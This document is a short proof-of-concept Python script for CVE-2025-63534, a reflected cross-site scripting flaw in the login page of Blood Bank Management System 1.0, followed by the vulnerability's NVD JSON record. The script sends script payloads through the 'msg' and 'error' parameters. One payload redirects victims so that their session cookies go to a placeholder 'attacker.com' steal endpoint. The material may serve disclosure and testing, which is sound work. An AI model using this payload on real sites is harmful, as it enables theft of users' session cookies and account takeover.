CVE-2025-63534

import requests # CVE-2025-63534 PoC - XSS in Blood Bank Management System 1.0 login.php # Target URL with malicious payload in 'msg' parameter target_url = "http://target-server/blood_bank/login.php" # XSS payload to steal cookies xss_payload = "<script>alert(document.cookie)</script>" # Alternative payload for cookie stealing cookie_steal_payload = "<script>document.location='http://attacker.com/steal?c='+document.cookie</script>" # Method 1: GET request with msg parameter params = { 'msg': xss_payload } print("[*] Sending XSS payload via GET request...") response = requests.get(target_url, params=params) if xss_payload in response.text: print("[+] Payload reflected in response - XSS vulnerability confirmed!") print(f"[+] Response status: {response.status_code}") else: print("[-] Payload not reflected") # Method 2: POST request with error parameter data = { 'error': cookie_steal_payload, 'username': 'test', 'password': 'test' } print("[*] Sending XSS payload via POST request...") response = requests.post(target_url, data=data) if cookie_steal_payload in response.text: print("[+] Payload reflected in POST response - XSS vulnerability confirmed!")

{"cve": {"id": "CVE-2025-63534", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:56.117", "lastModified": "2025-12-03T22:00:39.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cross-site scripting (XSS) vulnerability exists in the Blood Bank Management System 1.0 within the login.php component. The application fails to properly sanitize or encode user-supplied input before rendering it in response. An attacker can inject malicious JavaScript payloads into the msg and error parameters, which are then executed in the victim's browser when the page is viewed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shridharshukl:blood_bank_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5B391DFD-8072-4642-9A31-9E4DE8648367"}]}]}], "references": [{"url": "https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/Shridharshukl/Blood-Bank-Management-System", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63534.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}